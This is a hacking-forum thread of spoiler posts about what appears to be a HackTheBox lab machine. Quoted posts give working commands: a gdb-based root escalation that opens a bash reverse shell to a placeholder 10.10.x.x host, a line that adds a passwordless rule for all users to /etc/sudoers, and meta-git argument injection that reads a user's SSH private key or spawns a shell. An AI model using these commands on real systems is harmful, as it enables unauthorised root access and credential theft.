Return to forum

Sub · July 21, 2022 at 2:09 PM

(July 2, 2022, 10:11 PM)Bumper111 Wrote: SSH for user: developer

nah

fack · July 22, 2022 at 1:17 PM

xxcxcc

someRandom · July 25, 2022 at 6:52 PM

there's a deserialization way of solving this box if anyone wants to find a rabbit hole when they are done.

it's probably not the intended method but that's how I did most of the box

gldoter · July 26, 2022 at 11:56 AM

(July 11, 2022, 06:14 AM)bothack Wrote:
(July 3, 2022, 09:26 AM)hacker1111 Wrote: For Root:
export PID=$(ps aux | grep "^root.*python3" | awk '{print $2}')
gdb -p $PID
call (void)system("bash -c 'bash -i >& /dev/tcp/10.10.x.x/9001 0>&1'")
I changed a Little bit.

export privesc=$(ps aux | grep root | grep /usr/bin/python3 | grep -v grep | awk '{print $2}'); gdb -p $privesc

call (void)system("echo 'ALL ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers")

sudo sh

BOOM!!!

dude don't do this comeone! in this way u ruined box for others :s

crs · July 26, 2022 at 1:44 PM

(July 3, 2022, 07:21 AM)hacker1111 Wrote:
(July 3, 2022, 07:11 AM)quick443 Wrote: finally got a user but I can not escalate to developer, with the payload that someone said before

sudo -u developer /usr/local/bin/meta-git clone 'test||cat /home/developer/.ssh/id_rsa'

meta git cloning into 'test||cat /home/developer/.ssh/id_rsa' at id_rsa

id_rsa:
id_rsa: command 'git clone test||cat /home/developer/.ssh/id_rsa id_rsa' exited with error: Error: spawnSync /bin/sh EACCES

use this from /tmp directory and u can just do this
sudo -u developer /usr/local/bin/meta-git clone 'test||bash'

Could you explain why this happens? Because it doesn't work in the home directory, but it works in /tmp

bothack · July 27, 2022 at 2:12 PM

(July 26, 2022, 11:56 AM)gldoter Wrote:
(July 11, 2022, 06:14 AM)bothack Wrote:
(July 3, 2022, 09:26 AM)hacker1111 Wrote: For Root:
export PID=$(ps aux | grep "^root.*python3" | awk '{print $2}')
gdb -p $PID
call (void)system("bash -c 'bash -i >& /dev/tcp/10.10.x.x/9001 0>&1'")
I changed a Little bit.

export privesc=$(ps aux | grep root | grep /usr/bin/python3 | grep -v grep | awk '{print $2}'); gdb -p $privesc

call (void)system("echo 'ALL ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers")

sudo sh

BOOM!!!
dude don't do this comeone! in this way u ruined box for others :s

Brother that was just a nudge;

u53r · July 27, 2022 at 4:39 PM

(July 2, 2022, 10:11 PM)Bumper111 Wrote: SSH for user: developer

nice

mr17 · July 29, 2022 at 12:20 PM

thanks

mr17 · August 1, 2022 at 12:43 PM

https://aditya-chauhan17.medium.com/hackthebox-writeup-faculty-10-10-11-169-c67211dd8ec2

rdre8 · August 2, 2022 at 8:12 PM

(July 2, 2022, 10:11 PM)Bumper111 Wrote: SSH for user: developer

hi